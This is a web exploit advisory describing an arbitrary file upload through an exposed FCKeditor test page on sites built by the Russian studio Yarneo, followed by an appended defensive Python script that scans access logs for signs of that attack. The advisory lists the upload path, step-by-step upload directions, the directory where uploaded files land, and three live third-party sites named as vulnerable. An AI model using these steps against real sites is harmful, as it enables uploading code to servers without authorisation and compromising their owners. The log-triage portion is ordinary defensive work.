ЯрНео Website Development (Yarneo WebDesign) Unauthorized File Insertion

2019.05.21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

####################################################################
# Exploit Title : ЯрНео Website Development (Yarneo WebDesign) Unauthorized File Insertion
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 21/05/2019
# Vendor Homepage : yarneo.ru
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Description About Software :
*****************************
Yarneo is a Web Design and Development Company in Russia.
####################################################################
# Impact :
***********
Yarneo is prone to a vulnerability that lets attackers upload arbitrary files because it fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
####################################################################
# Arbitrary File Upload / Unauthorized File Insert Exploit :
**************************************************
/fckeditor/editor/filemanager/connectors/uploadtest.html
Select the "File Uploader" to use: Choose PHP and upload your file.
Directory File Path :
**********************
/pic/userfile/[YOURFILENAME].txt .jpg .gif .png
####################################################################
# Example Vulnerable Sites :
************************
[+] xn--1-7sb3aeok0dwc.xn--p1ai/fckeditor/editor/filemanager/connectors/uploadtest.html
[+] xn--l1adfni2d.xn--p1ai/fckeditor/editor/filemanager/connectors/uploadtest.html
[+] xn--90auhhdlh4g.xn--p1ai/fckeditor/editor/filemanager/connectors/uploadtest.html
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################
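Added example (not part of the advisory above): a small log triage script for site owners checking whether the leftover FCKeditor connector directory and the /pic/userfile/ upload path named in the advisory are being hit. It flags any request under the connectors directory (uploadtest.html must not be deployed on a production site), flags files in the upload directory whose name has a double extension or an extension outside the .txt/.jpg/.gif/.png set the advisory lists, and reports clients that did both. The log lines are constructed; the connectors/php/upload.php path is an assumption drawn from FCKeditor's layout, not from the advisory.

```python
import re
from collections import defaultdict

CONNECTOR_PREFIX = "/fckeditor/editor/filemanager/connectors/"  # connector directory named in the advisory
UPLOAD_DIR = "/pic/userfile/"                                  # upload directory named in the advisory
ALLOWED_EXT = {"txt", "jpg", "gif", "png"}                      # extensions the advisory says land there

# Apache "combined" log line: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample log (not from the advisory); the connectors/php/upload.php path is an assumption.
SAMPLE_LOG = """\
203.0.113.7 - - [21/May/2019:10:01:02 +0300] "GET /fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
203.0.113.7 - - [21/May/2019:10:01:09 +0300] "POST /fckeditor/editor/filemanager/connectors/php/upload.php?Type=File HTTP/1.1" 200 412 "-" "Mozilla/5.0"
203.0.113.7 - - [21/May/2019:10:01:15 +0300] "GET /pic/userfile/notes.php.txt HTTP/1.1" 200 88 "-" "Mozilla/5.0"
198.51.100.4 - - [21/May/2019:10:05:00 +0300] "GET /pic/userfile/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

def risky_upload_name(path):
    """A file under the upload dir is risky if it has a double extension or one outside the allowlist."""
    name = path.split("?", 1)[0].rsplit("/", 1)[-1].lower()
    exts = name.split(".")[1:]             # e.g. "notes.php.txt" -> ["php", "txt"]
    return len(exts) != 1 or exts[0] not in ALLOWED_EXT

def analyze(log_text):
    """Return (findings, chained_ips): every suspicious request, plus the clients that both
    POSTed to the connector directory and then fetched a risky file name from the upload dir."""
    findings, seen = [], defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path, status = m.group("ip", "method", "path", "status")
        if path.startswith(CONNECTOR_PREFIX):
            # Any reachable connector page is a finding; a 200 on uploadtest.html means it is still deployed.
            kind = "connector_post" if method == "POST" else "connector_access"
        elif path.startswith(UPLOAD_DIR) and risky_upload_name(path):
            kind = "risky_upload_name"
        else:
            continue
        findings.append({"ip": ip, "kind": kind, "path": path, "status": status})
        seen[ip].add(kind)
    chained = sorted(ip for ip, kinds in seen.items() if {"connector_post", "risky_upload_name"} <= kinds)
    return findings, chained

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG)[0]:
        print(finding)
```

Point it at a real access log with `analyze(open(path).read())`; the cheap fix it supports is removing the connectors directory outright and serving /pic/userfile/ with script execution disabled.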


Copyright 2024, cxsecurity.com